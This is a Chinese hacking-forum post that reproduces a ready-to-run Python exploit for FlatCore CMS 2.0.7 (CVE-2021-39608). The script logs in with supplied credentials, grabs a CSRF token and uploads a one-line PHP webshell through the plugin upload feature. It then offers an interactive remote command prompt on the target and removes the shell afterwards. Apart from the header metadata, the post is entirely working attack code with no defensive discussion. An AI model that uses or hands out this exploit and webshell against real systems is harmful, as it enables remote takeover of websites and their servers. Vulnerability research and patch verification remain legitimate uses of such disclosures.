跳转到帖子

  • 游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

    赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

    TheHackerWorld官方

FlatCore CMS 2.0.7 - Remote Code Execution (RCE) (Authenticated)

 分享
HACK1949

HACK1949
CHT漏洞数据库

推荐的帖子

HACK1949 Grand Master

HACK1949

发布于
发布于 
# Exploit Title: FlatCore CMS 2.0.7 - Remote Code Execution (RCE) (Authenticated)
# Date: 04/10/2021
# Exploit Author: Mason Soroka-Gill @sgizoid
# Vendor Homepage: https://flatcore.org/
# Software Link: https://github.com/flatCore/flatCore-CMS/archive/refs/tags/v2.0.7.tar.gz
# Version: 2.0.7
# Tested on: Ubuntu Server 21.04
# CVE: CVE-2021-39608
# References:
#   - https://github.com/flatCore/flatCore-CMS/issues/52

#!/usr/bin/env python3

import sys
import requests
from lxml import html
from urllib.parse import urlencode

if len(sys.argv) != 4:
    print(f"Usage: {sys.argv[0]} 'http(s)://TARGET' 'USERNAME' 'PASSWORD'")
    exit(1)

TARGET   = sys.argv[1]
USERNAME = sys.argv[2]
PASSWORD = sys.argv[3]

# attempt to log in
resp = requests.post(f"{TARGET}/index.php?p=1",
        data={
            "login_name":f"{USERNAME}",
            "login_psw":f"{PASSWORD}",
            "login":"Anmelden"})

# grab the PHP session ID
PHPSESSID = resp.headers['Set-Cookie'].split(";")[0]

# validate credentials worked
resp = requests.get(f"{TARGET}/acp/acp.php?tn=addons",
        headers={"Cookie":PHPSESSID})
if resp.status_code != 200:
    print("Invalid credentials")
    exit(1)
else:
    print("Logged in")

# grab the csrf token for the script upload
csrf_token = html.document_fromstring(resp.text).xpath('//form/input[7]')[0].value

# post the shell to the host
resp = requests.post(f"{TARGET}/acp/core/files.upload-script.php",
        data={"upload_type":"plugin", "csrf_token":csrf_token},                     # the csrf token
        files={"file":("sgizoid.php", "<?php echo shell_exec($_GET['sg']); ?>")},   # the webshell
        headers={"Cookie":PHPSESSID})                                               # the php session id

# pretend to be a shell
while True:
    command = input("$ ")
    if command.lower() == "exit" or command.lower() == "q":
        break
    resp = requests.get(f"{TARGET}/upload/plugins/sgizoid.php?{urlencode({'sg':command})}")
    # verify payload succeeded
    if resp.status_code == 200:
        print(resp.text)
    else:
        print("Error: Something went wrong, maybe the shell didn't work?")
        break

# delete the webshell
resp = requests.get(f"{TARGET}/acp/acp.php?tn=moduls&sub=u&dir=plugins&del=sgizoid.php",
        headers={"Cookie":PHPSESSID})
if resp.status_code == 200:
    print("Cleaned up webshell")

# clean up the session
resp = requests.get(f"{TARGET}/index.php?goto=logout",
        headers={"Cookie":PHPSESSID})
if resp.status_code == 200:
    print("Logged out")

exit(0)
链接帖子
意见的链接
分享到其他网站
 分享
转到主题列表

黑客攻防讨论组

黑客攻防讨论组

  
    You don't have permission to chat.

    • 最近浏览   0位会员

      • 没有会员查看此页面。

    黑客世界站内导航 (SITE MAP)

    ×
    ×
    • 创建新的...